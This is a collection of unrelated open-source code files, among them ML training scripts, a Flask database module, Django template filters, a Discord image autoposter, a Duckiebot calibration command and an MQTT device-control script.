macbert_classifier_model([x1]).cuda() \n \n output_bert=output_bert.view((1,-1)).cuda()\n output_bertwwm=output_bertwwm.view((1,-1)).cuda()\n output_macbert=output_macbert.view((1,-1)).cuda()\n \n bert_predicted_proba = softmax(output_bert).cuda().tolist()[0]\n bertwwm_predicted_proba = softmax(output_bertwwm).cuda().tolist()[0]\n macbert_predicted_proba = softmax(output_macbert).cuda().tolist()[0]\n \n predicted_proba=(np.array(bert_predicted_proba)+np.array(bertwwm_predicted_proba)+np.array(macbert_predicted_proba))/3\n predicted_index = np.argmax(predicted_proba)\n predicted_label = index[predicted_index]\n\n # 预测类别的预测概率\n proba = predicted_proba[predicted_index]\n\n return [predicted_label, round(proba, 2)]\n\n\ndef predict_test():\n qita_ids=np.load('../data/encode_data/qita_ids.npy')\n test=pd.read_csv(TEST_FILE_PATH)\n test_drop=test.drop(labels=qita_ids)\n test_text=test['text'].apply(eval)\n test_text=test_text.drop(labels=qita_ids)\n\n print(\"Start evluation...\")\n print(\"Load bert_classifier model path: \", bert_model_path)\n\n bert_classifier_model = torch.load(bert_model_path)\n bert_classifier_model = bert_classifier_model.cuda()\n bert_classifier_model.eval()\n\n bertwwm_classifier_model = torch.load(bertwwm_model_path)\n bertwwm_classifier_model = bertwwm_classifier_model.cuda()\n bertwwm_classifier_model.eval()\n\n macbert_classifier_model = torch.load(macbert_model_path)\n macbert_classifier_model = macbert_classifier_model.cuda()\n macbert_classifier_model.eval()\n\n with torch.no_grad():\n test_drop[[\"predicted_label\", \"proba\"]] = test_text.progress_apply(\n lambda x: pd.Series(predict_(x, INDEX, bert_classifier_model,bertwwm_classifier_model,macbert_classifier_model)))\n\n # 提取id, predicted_label两列信息,并重命名列名, 最后输出到文件\n csv_data = test[['id']]\n doctype=[]\n for i in range(len(csv_data)):\n if i in qita_ids:\n doctype.append('其他')\n else:\n doctype.append(test_drop.loc[i]['predicted_label'])\n csv_data['predict_doctype']=doctype\n print(\"\\n\\n=================== The distribution of predictions ===================\\n\")\n print(csv_data[\"predict_doctype\"].value_counts())\n print(\"\\n\\n\")\n csv_data.to_csv(submission_path, index=False,encoding='utf-8')\n print('done')","sub_path":"code/test_predict.py","file_name":"test_predict.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"441345519","text":"from mugimugi_client_api_entity.enum import Ratio\r\nfrom mugimugi_client_api_entity.main.book import Content\r\n\r\nfrom ......configuration import SAMPLE\r\nfrom ...abstract import Sample\r\n\r\n\r\nclass BookContentFemdom(Sample[Content]):\r\n file_path = SAMPLE / \"book/item/content/femdom.xml\"\r\n object = Content(\r\n english_name=\"Domination (Femdom)\",\r\n japanese_name=\"女性支配・女王様・ドミナ\",\r\n katakana_name=\"\",\r\n other_names=[],\r\n _id=\"K48\",\r\n version=2,\r\n objects_count=7083,\r\n ratio=Ratio.NOT_SET,\r\n _type_validator=Content.Type.TYPE,\r\n )\r\n","sub_path":"test/resource/xml/sample/item/content/femdom.py","file_name":"femdom.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"582116204","text":"# -*- coding: utf-8 -*-\r\n'''信息展示操作\r\n\r\n@author: Gao Le\r\n'''\r\n\r\nfrom model.db import db\r\nfrom flask import session, make_response, jsonify\r\nimport time\r\n\r\n\r\nSTATUS = 'active'\r\n\r\n\r\ndef project_list():\r\n try:\r\n with db.cursor() as cursor:\r\n sql = \"SELECT * FROM project\"\r\n cursor.execute(sql)\r\n result = cursor.fetchall()\r\n finally:\r\n return result\r\n\r\n\r\ndef project_add(project):\r\n if 'user_id' in session:\r\n owner_id = session['user_id']\r\n\r\n try:\r\n with db.cursor() as cursor:\r\n sql = \"SELECT * FROM project WHERE name=%s\"\r\n cursor.execute(sql, project['name'])\r\n project_exist = cursor.fetchall()\r\n\r\n if project_exist:\r\n result = {'msg': '项目名称重复'}\r\n res_msg = make_response(jsonify(message=\"success\", data=result, status=200), 200)\r\n\r\n else:\r\n with db.cursor() as cursor:\r\n sql = \"INSERT INTO project (name,detail,ownerId,status) VALUE (%s, %s, %s, %s)\"\r\n cursor.execute(sql, (project['name'], project['detail'], owner_id, STATUS))\r\n db.commit()\r\n\r\n with db.cursor() as cursor:\r\n sql = \"SELECT * FROM project WHERE name=%s\"\r\n cursor.execute(sql, (project['name']))\r\n result = cursor.fetchone()\r\n\r\n res_msg = make_response(jsonify(message=\"success\", data=result, status=201), 201)\r\n finally:\r\n return res_msg\r\n\r\n\r\ndef task_list():\r\n try:\r\n with db.cursor() as cursor:\r\n sql = \"SELECT t.id, t.title, t.detail, t.status,t.level,u.username AS ownerName, m.username AS memberName,t.createAt FROM task t \" \\\r\n \"LEFT JOIN user u ON t.ownerId=u.id LEFT JOIN user m ON t.memberId=m.id\"\r\n cursor.execute(sql)\r\n result = cursor.fetchall()\r\n finally:\r\n return result","sub_path":"api/model/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"159737759","text":"# -*- coding: utf-8 -*-\n# @Time : 19-7-2 下午5:00\n# @Author : MRB\n# @File : MNIST.py\n# @Software: PyCharm Community Edition\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\n\n# 导入数据\nmnist = input_data.read_data_sets(\"MNIST_data\",one_hot=True)\n\n# 定义参数\nbatch_size = 100\nlearning_rate = 0.8\nlearning_rate_decay = 0.999\nmax_steps = 30000\n\ntraining_step = tf.Variable(0,trainable=False)\n\n# 定义网络\n\ndef hidden_layer(input_tensor,weight1,bias1,weight2,bias2,layer_name):\n layer1 = tf.nn.relu(tf.matmul(input_tensor,weight1) + bias1)\n return tf.nn.relu(tf.matmul(layer1,weight2)+bias2)\n\nx = tf.placeholder(tf.float32,[None,784],name='x-input')\ny_ = tf.placeholder(tf.float32,[None,10],name='y-output')\n\n# 生成隐藏层参数\nweights1 = tf.Variable(tf.truncated_normal([784,500],stddev=0.1))\nbiases1 = tf.Variable(tf.constant(0.1,shape=[500]))\n# 生成输出层参数\nweights2 = tf.Variable(tf.truncated_normal([500,10],stddev=0.1))\nbiases2 = tf.Variable(tf.constant(0.1,shape=[10]))\n\n# 计算得到y\ny = hidden_layer(x,weights1,biases1,weights2,biases2,'y')\n\n# 初始化一个滑动平均类\naverages_class = tf.train.ExponentialMovingAverage(0.99,training_step)\naverages_op = averages_class.apply(tf.trainable_variables())\n\naverages_y = hidden_layer(x,\n averages_class.average(weights1),\n averages_class.average(biases1),\n averages_class.average(weights2),\n averages_class.average(biases2),\n \"average_y\")\n\ncross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y,labels=tf.arg_max(y_,1))\nregularizer = tf.contrib.layers.l2_regularizer(0.0001)\nregularization = regularizer(weights1) + regularizer(weights2)\n\nloss = tf.reduce_mean(cross_entropy)+regularization\nlearning_rate = tf.train.exponential_decay(learning_rate,training_step,mnist.train.num_examples/batch_size,learning_rate_decay)\n\ntraining_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss,global_step=training_step)\n\nwith tf.control_dependencies([training_step,averages_op]):\n train_op = tf.no_op(name='train')\n\ncrornt_prediction = tf.equal(tf.argmax(averages_y,1),tf.argmax(y_,1))\naccuracy = tf.reduce_mean(tf.cast(crornt_prediction,tf.float32))\n\nwith tf.Session() as sess:\n tf.global_variables_initializer().run()\n validate_feed = {x:mnist.validation.images,y_:mnist.validation.labels}\n test_feed = {x: mnist.test.images, y_: mnist.test.labels}\n \n for i in range(max_steps):\n if i%1000 ==0:\n validata_accuracy = sess.run(accuracy,feed_dict=validate_feed)\n print(i,accuracy)\n\n xs,ys = mnist.train.next_batch(batch_size=100)\n sess.run(train_op,feed_dict={x:xs,y:ys})\n test_accuracy = sess.run(accuracy, feed_dict=test_feed)\n print(max_steps, accuracy)\n","sub_path":"MNIST.py","file_name":"MNIST.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222106517","text":"# scatterTG.py\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib.ticker as tick\n\n# leo el excel\nar = pd.read_excel('Muscle8.xlsx','dw', header=0,index_col=None, na_values=['NA'])\narnum = ar.values\n\nr = arnum.shape[0]\n\nmat = np.empty((3,0))\n\nfor i in range(r):\n if arnum[i,53] > 0:\n mat = np.append(mat,[[arnum[i,1]],[arnum[i,7]],[arnum[i,53]]], axis = 1)\n\n#print (mat[2,:])\n\nTG = mat[2,:]\ncop = mat[1,:]\nTG = TG.astype(float) \ncop = cop.astype(float)\n\n#print(TG,cop)\n\nsizeBA = 0\nsizeN = 0\nsizeBAMIG = 0\n\nfor a in mat[0,:]:\n if a == 'BA':\n sizeBA += 1\n elif a == 'N':\n sizeN += 1\n else:\n sizeBAMIG += 1\n\n#print(sizeBA, sizeN, sizeBAMIG) \n\nfig = plt.figure(facecolor='w', figsize=(7,5))\ncsfont = {'fontname':'Liberation Sans'}\n\ngraph = fig.add_axes([0.18,0.19,0.77,0.75])\n#graph.plot(TG, cop, 'o', color = 'w', markersize = 8, markeredgecolor = 'k')\ngraph.plot(TG[0:sizeBA], cop[0:sizeBA], 'o', color = 'k', markersize = 10, markeredgecolor = 'k')\ngraph.plot(TG[sizeBA:sizeBA+sizeN], cop[sizeBA:sizeBA+sizeN], 'o', color = 'w', markersize = 10, markeredgecolor = 'k')\ngraph.plot(TG[sizeBA+sizeN:sizeBA+sizeN+sizeBAMIG], cop[sizeBA+sizeN:sizeBA+sizeN+sizeBAMIG], 'o', color = 'grey', markersize = 10, markeredgecolor = 'k')\n\n#el cop ajusta una exponencial con TG, asi que linearizo tomando ln de cop y usando ecuacion de la recta\nlogcop = [np.log(s) for s in cop]\nq = np.polyfit(TG, logcop, 1)\ndef func(X,a,b):\n return (a+(X*b))\nx = np.linspace(25,100,100)\nprint(q)\nprint(cop,logcop)\ngraph.semilogy(x, np.exp(func(x,q[1],q[0])), 'k--', linewidth=2)\n\n#seteo ejes\n#plt.ylim(-2,300)\nplt.ylim(0.01,300)\nplt.xlim(0,100)\ngraph.yaxis.set_major_formatter(tick.FormatStrFormatter('%g'))\nplt.yticks([0.01,0.1,1,10,100,1000], size = 20, **csfont)\n#plt.yticks(size = 20, **csfont)\nplt.xticks(np.arange(0,101,25), size = 20, **csfont)\ngraph.set_ylabel(\"Coprostanol (%sg/g dw)\"%(u\"\\u03BC\"), weight = 'bold', size=22, **csfont)\ngraph.set_xlabel(\"Triglycerides (% total lipids)\", weight = 'bold', size = 22, **csfont)\ngraph.spines['right'].set_visible(False)\ngraph.spines['top'].set_visible(False)\n\ngraph.yaxis.set_ticks_position('left')\ngraph.xaxis.set_ticks_position('bottom')\ngraph.tick_params(axis = 'y', which = 'minor', length = 0)\n\nplt.show()\n","sub_path":"scatterTG.py","file_name":"scatterTG.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"307974351","text":"# -*- coding: utf-8 -*-\n# \nfrom django import template\nfrom django.contrib.humanize.templatetags.humanize import intcomma\n\nregister = template.Library()\n\n@register.filter()\ndef pounds_pennies(pounds):\n\t\"\"\"\n\tFormats as 11,123.45\n\t\"\"\"\n\tif pounds:\n\t\tpounds = round(float(pounds), 2)\n\t\tcurr = u'\\u00a3'+ str(intcomma(int(pounds)) +str(\"%0.2f\" % pounds)[-3:])\n\t\treturn curr\n\telse: return ''\n\n\n@register.filter()\ndef pounds(pounds):\n\t\"\"\"\n\tFormats as 11,123.45\n\t\"\"\"\n\tif pounds:\n\t\tpounds = round(float(pounds), 0)\n\t\tcurr = u'\\u00a3'+ str(intcomma(int(pounds)))\n\t\treturn curr\n\telse: return ''\n\n@register.filter()\ndef money(pounds, currency=''):\n\t\"\"\"\n\tFormats as 11,123.45\n\t\"\"\"\n\tif pounds:\n\t\tpounds = int(pounds)\n\t\tcurr = currency + str(intcomma(int(pounds)))\n\t\treturn curr\n\telse: return ''\n","sub_path":"core/templatetags/money_handling.py","file_name":"money_handling.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"430472930","text":"import datetime\nimport pymysql\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nimport datetime\nimport re\nimport paho.mqtt.client as mqtt\nimport binascii\nimport json\nfrom PyCRC.CRC16 import CRC16\n\ndef getcrc(crcdm):\n target = bytes().fromhex(crcdm)\n crc = \"{:4X}\".format(\n CRC16(modbus_flag=True).calculate(target))\n crc = crc[2:4] + crc[0:2];\n crcdm = crcdm + crc;\n return crcdm\n\n\ndef on_connect(client, userdata, flags, rc):\n print(\"连接成功 \"+str(rc))\n\n# The callback for when a PUBLISH message is received from the server.\ndef on_message(client, userdata, msg):\n print('dddd')\n data=bytearray.hex(bytearray(msg.payload))\n pattern = re.compile('.{1,2}')\n s = ' '.join(pattern.findall(data))\n datas = s.split(' ')\n ctrnum = datas[1]\n if ctrnum=='03':\n df=int(datas[67]+datas[68]+datas[69]+datas[70], 16)/100\n sydf=df\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"139.199.219.142\", 1883, 60)\n\n# 控制设备开关\ndef z(equNumber,number,switch):\n\n dyh=equNumber+'ctrraw'\n print(dyh)\n dm=''\n if(switch=='open'):\n dm=number+'06000455CC'\n crcdm=getcrc(dm)\n else:\n dm=number+'06000455AA'\n crcdm=getcrc(dm)\n client.subscribe(dyh)\n client.publish(dyh, bytearray.fromhex(crcdm))\n\n client.loop_start()\n #\n t={}\n t['crcdm']=crcdm\n return t\n\n\ndef my_job():\n db = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='root', db='Conch', charset='utf8')\n cursor = db.cursor()\n # SQL删除记录语句\n sql1 = \"SELECT * FROM database_equipment \"\n\n try:\n # 执行SQL语句\n cursor.execute(sql1)\n # 向数据库提交\n results1 = cursor.fetchall()\n for row in results1:\n if (row[7] == '1'):\n controlstate(row[1],row[2],'close')\n except:\n # 发生错误时回滚\n db.rollback()\n db.close()\n#\nsched = BlockingScheduler()\nsched.add_job(my_job, 'cron', hour=9)\nsched.start()\n\n# my_job()\n\n\n\n\n","sub_path":"代码/后台代码/ImportDatad/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"111216730","text":"import requests, time, random\nfrom config import webhook_id, webhook_token\n\nwebhook_url = \"https://discordapp.com/api/webhooks/{0}/{1}\".format(webhook_id, webhook_token)\n\ndef get_img():\n img_type = random.choice([\"lewdneko\", \"lewdkitsune\", \"hentai\", \"neko\", \"hentai_anal\"])\n img = requests.get(\"https://nekobot.xyz/api/image?type={0}\".format(img_type)).json()\n img = img[\"message\"]\n payload = {\n \"embeds\": [\n {\n \"color\": 0xDEADBF,\n \"image\": {\n \"url\": img\n }\n }\n ]\n }\n return payload\n\ndef post_hook():\n requests.post(webhook_url, json=get_img())\n\nwhile True:\n print(\"Posting Neko!\")\n post_hook()\n time.sleep(3600)","sub_path":"Tools/autoposter.py","file_name":"autoposter.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"419345299","text":"\r\nimport time\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\n## Given an array of integers <= 10^5, and array size <=10^4, find whether there is a majority element (and if so, what it is).\r\n## Idea:\r\n## Sort list.\r\n## Then iterate through and take a step of half the list length forwards. \r\n## Ex: list length = 10, say we are at idx 1 (0-indexing), check if the element at idx 6 (maybe 7th) is identical, \r\n## if so, then it is the majority element.\r\n\r\ndef main():\r\n\t\r\n\tdir_loc = \"C:/Users/Jyler/Documents/ProgrammingProjects/rosalind/\"\r\n\tfile_name = \"rosalind_maj.txt\"\r\n\t#file_name = \"ex_maj.txt\"\r\n\r\n\tnum = 0\r\n\tt0 = time.time()\r\n\twith open(dir_loc + file_name) as f1:\r\n\t\t\r\n\r\n\t\tlst_to_write = []\r\n\t\tfor line in f1:\r\n\r\n\t\t\tnum += 1\r\n\t\t\tif num == 1:\r\n\t\t\t\tk_n = line.strip(\"\\n\")\r\n\t\t\t\tk_n_lst = line.split(\" \")\r\n\t\t\t\tk = int( k_n_lst[0] )\r\n\t\t\t\tn = int( k_n_lst[1] )\r\n\t\t\t\t#print(\"k, n = \", k, n)\r\n\r\n\t\t\telif num > 1:\r\n\t\t\t\t#input(\"Continue?\")\r\n\t\t\t\tnumbers = line.strip(\"\\n\")\r\n\t\t\t\tnumbers_list = numbers.split(\" \")\r\n\t\t\t\tnumbers_list_int = [int(i) for i in numbers_list]\r\n\r\n\r\n\t\t\t\tnumbers_list_int.sort()\r\n\t\t\t\t#print(numbers_list_int)\r\n\t\t\t\tfound_one = None\r\n\r\n\t\t\t\tt1 = time.time()\r\n\t\t\t\tprint(\"num = \",num, \" time to half = \", t1-t0)\r\n\r\n\t\t\t\tfirst_elem = numbers_list_int[0]\r\n\t\t\t\tlast_elem = numbers_list_int[n-1]\r\n\t\t\t\tquick_chk_mid_r = numbers_list_int[(n//2)+1]\r\n\t\t\t\tquick_chk_mid_l = numbers_list_int[(n//2)-1]\r\n\t\t\t\tquick_chk_quart = numbers_list_int[(n//4)]\r\n\t\t\t\tquick_chk_3quart = numbers_list_int[( (3*n)//4 )]\r\n\t\t\t\t\r\n\r\n\t\t\t\t# Quckly check the first and last elements of the list.\r\n\t\t\t\tif ( (quick_chk_mid_r == first_elem) ):\r\n\t\t\t\t\t#found_one = 1\r\n\t\t\t\t\tlst_to_write.append(first_elem) \r\n\t\t\t\telif (quick_chk_mid_l == last_elem ):\r\n\t\t\t\t\t#found_one = 1\r\n\t\t\t\t\tlst_to_write.append(last_elem)\r\n\t\t\t\telif ( quick_chk_quart == quick_chk_3quart ):\r\n\t\t\t\t\tlst_to_write.append(quick_chk_quart)\r\n\t\t\t\telse:\r\n\t\t\t\t\tfor idx in range(1, (n//2) - 2 ):\r\n\t\t\t\t\t\tstep_fwd = idx + (n//2) \r\n\t\t\t\t\t\telement = numbers_list_int[idx]\r\n\t\t\t\t\t\tfwd_half_len = numbers_list_int[step_fwd]\r\n\t\t\t\t\t\t#print(\"numbers_list_int = \",numbers_list_int)\r\n\t\t\t\t\t\t#print(\"elem = \",element, \" fwd_half_len = \",fwd_half_len)\r\n\t\t\t\t\t\tif (element == fwd_half_len):\r\n\t\t\t\t\t\t\tfound_one = 1\r\n\t\t\t\t\t\t\tlst_to_write.append(element)\r\n\t\t\t\t\t\t\tbreak\r\n\t\t\t\t###\r\n\r\n\t\t\t\t\tif (found_one == None):\r\n\t\t\t\t\t\tlst_to_write.append(-1)\r\n\t\t\t\tprint(\"Time to determine major elem = \", time.time() - t1)\r\n\r\n\t\t\t#num += 1\r\n\t###\r\n\tprint(\"\\n\",lst_to_write)\r\n\tstring_2_write = None\r\n\tfor elem in lst_to_write:\r\n\t\tif (string_2_write == None):\r\n\t\t\tstring_2_write = str(elem)\r\n\t\telse:\r\n\t\t\tstring_2_write += \" \" + str(elem)\r\n\r\n\twith open(dir_loc + \"result_maj.txt\",'a') as f2:\r\n\t\tf2.write(string_2_write)\r\n\r\n\tprint(\"Done\")\r\n\t#print(\"Time to half-point = \", t1-t0)\r\n\tprint(\"Global time elaspsed = \", time.time() - t0)\r\n\r\n\tpass","sub_path":"RosalindProblems/major_elem.py","file_name":"major_elem.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"516826588","text":"from __future__ import print_function\n\nimport argparse\nimport datetime\nfrom os.path import join, realpath, dirname\n\nfrom dt_shell import DTCommandAbs, dtslogger\nfrom dt_shell.env_checks import check_docker_environment\nfrom past.builtins import raw_input\n\nfrom utils.cli_utils import start_command_in_subprocess\nfrom utils.docker_utils import get_remote_client, RPI_DUCKIEBOT_BASE, RPI_DUCKIEBOT_CALIBRATION, bind_duckiebot_data_dir\n\n\nclass DTCommand(DTCommandAbs):\n\n @staticmethod\n def command(shell, args):\n script_file = join(dirname(realpath(__file__)), 'calibrate_extrinsics.sh')\n\n prog = 'dts duckiebot calibrate_extrinsics DUCKIEBOT_NAME'\n usage = \"\"\"\nCalibrate: \n\n %(prog)s\n\"\"\"\n\n parser = argparse.ArgumentParser(prog=prog, usage=usage)\n parser.add_argument('hostname', default=None, help='Name of the Duckiebot to calibrate')\n parsed_args = parser.parse_args(args)\n\n from utils.networking_utils import get_duckiebot_ip\n\n duckiebot_ip = get_duckiebot_ip(parsed_args.hostname)\n # shell.calibrate(duckiebot_name=args[0], duckiebot_ip=duckiebot_ip)\n script_cmd = '/bin/bash %s %s %s' % (script_file, parsed_args.hostname, duckiebot_ip)\n\n start_command_in_subprocess(script_cmd)\n\n\ndef calibrate(duckiebot_name, duckiebot_ip):\n local_client = check_docker_environment()\n duckiebot_client = get_remote_client(duckiebot_ip)\n\n duckiebot_client.images.pull(RPI_DUCKIEBOT_BASE)\n local_client.images.pull(RPI_DUCKIEBOT_CALIBRATION)\n\n duckiebot_client.containers.get('ros-picam').stop()\n\n timestamp = datetime.date.today().strftime('%Y%m%d%H%M%S')\n\n raw_input(\"{}\\nPlace the Duckiebot on the calibration patterns and press ENTER.\".format('*' * 20))\n\n log_file = 'out-calibrate-extrinsics-%s-%s' % (duckiebot_name, timestamp)\n source_env = 'source /home/software/docker/env.sh'\n rosrun_params = '-o /data/{0} > /data/{0}.log'.format(log_file)\n ros_pkg = 'complete_image_pipeline calibrate_extrinsics'\n start_command = '{0} && rosrun {1} {2}'.format(source_env, ros_pkg, rosrun_params)\n dtslogger.info('Running command: {}'.format(start_command))\n\n duckiebot_client.containers.run(image=RPI_DUCKIEBOT_CALIBRATION,\n privileged=True,\n network_mode='host',\n datavol=bind_duckiebot_data_dir(),\n command=\"/bin/bash -c '%s'\" % start_command)\n\n raw_input(\"{}\\nPlace the Duckiebot in a lane and press ENTER.\".format('*' * 20))\n\n log_file = 'out-pipeline-%s-%s' % (duckiebot_name, timestamp)\n rosrun_params = '-o /data/{0} > /data/{0}.log'.format(log_file)\n ros_pkg = 'complete_image_pipeline single_image_pipeline'\n start_command = '{0} && rosrun {1} {2}'.format(source_env, ros_pkg, rosrun_params)\n dtslogger.info('Running command: {}'.format(start_command))\n\n duckiebot_client.containers.run(image=RPI_DUCKIEBOT_CALIBRATION,\n privileged=True,\n network_mode='host',\n datavol=bind_duckiebot_data_dir(),\n command=\"/bin/bash -c '%s'\" % start_command)","sub_path":"duckiebot/calibrate_extrinsics/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"190592242","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport codecs\nimport matplotlib.pyplot as plt\nfrom scipy.misc import imread\nfrom wordcloud import WordCloud\n\nback_coloring = imread(\"nlp/mask.jpg\")\nwordcloud = WordCloud(font_path='nlp/文泉驿微米黑.ttf', background_color=\"white\", mask=back_coloring)\n\n\ndef show_wordcloud(data):\n plt.axis(\"off\")\n wc_img = wordcloud.fit_words(data)\n plt.imshow(wc_img)\n plt.axis(\"on\")\n\n\ndef search_path(o, to):\n path = \"\"\n for k, v in list(o.items()):\n if isinstance(v, dict):\n sub = search_path(v, to)\n if sub:\n path = k + \".\" + sub\n else:\n if to == v:\n path = k\n return path\n\n\ndef leaf_path(o):\n print(o)\n for k, v in list(o.items()):\n if isinstance(v, dict):\n subs = leaf_path(v)\n for sub_k, sub_v in subs:\n yield k + \".\" + sub_k, sub_v\n else:\n yield k, v\n\n\nwith codecs.open(\"nlp/name_start.txt\", 'r', 'utf-8') as fp:\n name_start = fp.readlines()\nname_start = [start.strip() for start in name_start]\n\n\ndef name_start_set():\n return name_start\n\n\ndef start_with(p, items):\n for item in items:\n if p.startswith(item):\n return True\n return False\n\n\ndef end_with(p, items):\n for item in items:\n if p.endswith(item):\n return True\n return False\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"hello/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"379453241","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('seadssite', '0004_auto_20141029_0138'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Devices',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('DeviceId', models.IntegerField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='UserDevice',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('DeviceId', models.ForeignKey(to='seadssite.Devices')),\n ('UserId', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"seadssite/migrations/0005_devices_userdevice.py","file_name":"0005_devices_userdevice.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357437715","text":"\"\"\"\nCopyright (c) {{current_year}} Cisco and/or its affiliates.\n\nThis software is licensed to you under the terms of the Cisco Sample\nCode License, Version 1.1 (the \"License\"). You may obtain a copy of the\nLicense at\n\n https://developer.cisco.com/docs/licenses\n\nAll use of the material herein must be in accordance with the terms of\nthe License. All rights not expressly granted by the License are\nreserved. Unless required by applicable law or agreed to separately in\nwriting, software distributed under the License is distributed on an \"AS\nIS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\nor implied.\n\nAUTHOR(s): Francisco Quiroz \n\"\"\"\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.0',\n 'supported_by': 'community',\n 'status': ['preview']\n}\n\n\nfrom ansible.module_utils.basic import AnsibleModule\nimport re\n\ndef main():\n \"\"\"Ansible module to verify create a text file with configuration for a XR router.\"\"\"\n module = AnsibleModule(\n argument_spec = dict(\n var1 = dict(type ='dict', required=True),\n var2 = dict(type ='str', required=True)\n ),\n supports_check_mode=True\n )\n\n f= open( f\"{module.params['var2']}.cfg\", \"w\")\n for old_map, new_map in module.params['var1'].items():\n if not \"tbd\" in old_map:\n speed_var=re.findall(r'([0-9]+)Mbps',new_map)[0]\n pm_var = f\"\"\"policy-map {speed_var}Mbps-IN\n class class-default\n police rate {speed_var} mbps\n conform-action set precedence 0\n exceed-action drop\n !\n!\n end-policy-map\n!\n\"\"\"\n f.write(pm_var)\n f.close()\n if module.check_mode:\n module.exit_json(changed=False)\n\n module.exit_json(meta=f\"{module.params['var2']}.cfg\")\n\n\nif __name__ == '__main__':\n \"\"\"Execute main program.\"\"\"\n main()\n\n# End of module\n","sub_path":"xr-temp-main/library/demo_module_03.py","file_name":"demo_module_03.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"461662901","text":"import json\nfrom shutil import copyfile, rmtree\nfrom os import mkdir\n\n\ndef filter(movie):\n imdb = movie['imdb_score_count'] > 0\n date = movie['release_date'] != \"\"\n genre = len(movie['genres']) > 0\n cast = len(movie['cast']) > 0\n crew = len(movie['crew']) > 0\n runtime = movie['runtime'] >= 60\n return imdb and date and genre and cast and crew and runtime\n\n\ndef main():\n\n n = 0\n rmtree(\"filtered\")\n mkdir(\"filtered\")\n mkdir(\"filtered/movies\")\n mkdir(\"filtered/posters\")\n top = []\n\n for movie in json.load(open(\"movies.json\", \"r\")):\n movie = json.load(open(\"movies/\" + movie['id'] + \".json\", \"r\"))\n\n if filter(movie):\n top.append((movie['imdb_score_count'], movie['title'], movie['id']))\n\n with open(\"filtered/movies.json\", \"w\") as f:\n f.write('[\\n')\n\n for (count, title, id) in sorted(top, reverse=True)[:5000]:\n print(count, title, n)\n copyfile(\"movies/\" + id + \".json\", \"filtered/movies/\" + id + \".json\")\n copyfile(\"posters/\" + id + \".jpg\", \"filtered/posters/\" + id + \".jpg\")\n n += 1\n f.write(\n ' {\"id\":\"%s\",\"title\":\"%s\"},\\n' % (\n id,\n title\n )\n )\n\n f.write(']\\n')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"app/static/data/scripts/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"578102405","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\n\n#Following code found online\ndef unpickle(file):\n import pickle\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\ndef load_cifar10_data(data_dir):\n '''Return train_data, train_labels, test_data, test_labels\n The shape of data is 32 x 32 x3'''\n train_data = None\n train_labels = []\n\n for i in range(1, 6):\n data_dic = unpickle(data_dir + \"/data_batch_{}\".format(i))\n if i == 1:\n train_data = data_dic[b'data']\n else:\n train_data = np.vstack((train_data, data_dic[b'data']))\n train_labels += data_dic[b'labels']\n\n test_data_dic = unpickle(data_dir + \"/test_batch\")\n test_data = 